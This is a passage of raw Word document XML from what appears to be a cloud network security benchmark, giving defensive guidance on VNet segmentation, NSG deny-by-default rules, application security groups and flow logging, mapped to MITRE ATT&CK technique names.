    </w:p>
    <w:p w14:paraId="602A51BF" w14:textId="3EF7A61F" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Malware propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DF0D7" w14:textId="4EE421F2" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>East-west traffic blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3DBA7" w14:textId="52B20454" w:rsidR="0038671B" w:rsidRPr="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="161616"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc242449466"/>
      <w:r w:rsidRPr="0038671B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="161616"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="663EA47C" w14:textId="3CB9FDB9" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822CDA4" w14:textId="7BEFEEDC" w:rsidR="0038671B" w:rsidRDefault="0038671B" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDEF07F" w14:textId="1DD00D53" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6BC12" w14:textId="6C96A160" w:rsidR="0038671B" w:rsidRDefault="0038671B" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E441B5" w14:textId="52E7059C" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43D5E8" w14:textId="284F9509" w:rsidR="0038671B" w:rsidRDefault="0038671B" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>T1041 - Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9428C0" w14:textId="04ED616F" w:rsidR="0038671B" w:rsidRDefault="0038671B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500E98AE" w14:textId="2766CF89" w:rsidR="0038671B" w:rsidRPr="0038671B" w:rsidRDefault="0038671B" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="340"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0038671B">
        <w:t>T1071 - Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF4A9B" w14:textId="077C343A" w:rsidR="00CD73C1" w:rsidRDefault="00CD73C1" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NS-1.1: Create segmentation using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and subnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796203E" w14:textId="305D5026" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Virtual network isolation establishes fundamental security boundaries within cloud environments, enabling organizations to separate workloads by trust level, organizational unit, or application grouping. This approach prevents unrestricted lateral movement and reduces blast radius when breaches occur, aligning network architecture with enterprise segmentation strategies and zero-trust principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055FD899" w14:textId="77777777" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="008A6111">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement virtual network segmentation by creating isolated network boundaries and subdivisions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A06E2F" w14:textId="0D22B8B7" w:rsidR="00076B5E" w:rsidRDefault="00076B5E" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Design </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> topology based on segmentation strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A62E12" w14:textId="0653D55C" w:rsidR="008A6111" w:rsidRPr="00E53977" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="008A6111">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>virtual networks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligned with trust zones, organizational units, or application groupings defined in your enterprise segmentation strategy, ensuring each </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a distinct security boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7E8D2" w14:textId="45F680E1" w:rsidR="00076B5E" w:rsidRDefault="00076B5E" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Isolate high-risk workloads</w:t>
      </w:r>
      <w:r w:rsidR="007A3B61" w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C66D4" w14:textId="443B4D84" w:rsidR="008A6111" w:rsidRPr="00E53977" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify workloads requiring strict isolation (e.g., production databases, payment processing systems) and deploy them into dedicated, isolated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to minimize exposure and prevent cross-contamination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C24E2C" w14:textId="23EE50F1" w:rsidR="00BB7EAC" w:rsidRDefault="00BB7EAC" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Create subnets for granular segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C98BF" w14:textId="7D0C8504" w:rsidR="008A6111" w:rsidRPr="00E53977" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Within each </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="008A6111">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>create distinct non-overlapping subnets</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to further segment the network based on application tiers (e.g., web tier, application tier, database tier) or functional requirements, enabling more precise traffic control and micro-segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255CA86" w14:textId="5D65F2D1" w:rsidR="002B27F1" w:rsidRDefault="002B27F1" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-1.2: Restrict network traffic using NSG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A286A1" w14:textId="0F429A41" w:rsidR="008A6111" w:rsidRDefault="008A6111">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Network security groups enforce traffic filtering at the subnet and network interface level, enabling precise control over communication flows between network segments and external networks. By implementing deny-by-default policies with explicit allow rules, organizations ensure only authorized traffic traverses network boundaries, preventing unauthorized access and reducing attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AF5D5" w14:textId="662A36AC" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
        </w:rPr>
        <w:t>Implement network traffic restriction using NSG rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D80C66" w14:textId="025680C9" w:rsidR="00D53BEE" w:rsidRDefault="00CE68AC" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Identify communication requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BFF48" w14:textId="7D9B9D8A" w:rsidR="00244965" w:rsidRPr="00E53977" w:rsidRDefault="00244965" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244965">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze resources in each </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244965">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244965">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to understand their north-south (external) and east-west (internal) traffic communication needs, documenting required ports, protocols, source addresses, and destination </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00244965">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>addresses</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00244965">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for legitimate business functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF7D0E" w14:textId="3A888D9A" w:rsidR="00FD084F" w:rsidRDefault="00FD084F" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Define explicit allow and deny rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608616A5" w14:textId="11514800" w:rsidR="002E33E0" w:rsidRPr="00E53977" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">For well-defined applications (e.g., three-tier architectures), use the "deny by default, permit by exception" approach to </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002E33E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>create NSG rules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on port, protocol, source IP address, and destination IP address, explicitly allowing only necessary traffic while denying all other communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D79B7" w14:textId="38B2AB2B" w:rsidR="006A6025" w:rsidRDefault="006A6025" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use application security groups for complex scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA086ED" w14:textId="7C3ACEC1" w:rsidR="002E33E0" w:rsidRPr="00E53977" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When many applications and endpoints interact, simplify NSG rule management by using application security groups (ASGs) to group resources logically (e.g., web servers, database servers), then define NSG rules based on these groups </w:t>
      </w:r>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>rather than explicit IP addresses, improving maintainability and reducing configuration complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE40D03" w14:textId="58E3F1AB" w:rsidR="006A6025" w:rsidRDefault="004E5327" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Monitor and optimize with flow logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940DFD0" w14:textId="075BF662" w:rsidR="002E33E0" w:rsidRPr="00E53977" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="002E33E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Arial"/>
          </w:rPr>
          <w:t>virtual network flow logging</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor traffic allowed or denied by NSG rules, identifying frequently denied traffic that may indicate misconfiguration or frequently allowed traffic that could inform rule optimization and reduce logging noise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481F135" w14:textId="64B65232" w:rsidR="00CE68AC" w:rsidRDefault="004B606C" w:rsidP="00314EE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc242449467"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Secure network boundaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4C4EBB17" w14:textId="1356913D" w:rsidR="004B606C" w:rsidRPr="00E53977" w:rsidRDefault="004B606C" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc242449468"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-2: Secure cloud native services with network controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="38FBA287" w14:textId="47BA31DA" w:rsidR="00823F01" w:rsidRDefault="00823F01" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C14CA" w14:textId="02EB7D6B" w:rsidR="002E33E0" w:rsidRPr="00E53977" w:rsidRDefault="002E33E0" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E33E0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use service native features to secure network access to the resources to avoid and reduce the exposure of the resources to the untrusted network. These features include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEF6B3" w14:textId="0E3FC68A" w:rsidR="0045296C" w:rsidRPr="00E53977" w:rsidRDefault="0045296C" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00831807">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy the resource into virtual networks where you can restrict the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to establish a private access point for the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416F723" w14:textId="79617954" w:rsidR="00F64BA8" w:rsidRPr="00E53977" w:rsidRDefault="00F64BA8" w:rsidP="00DD2377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
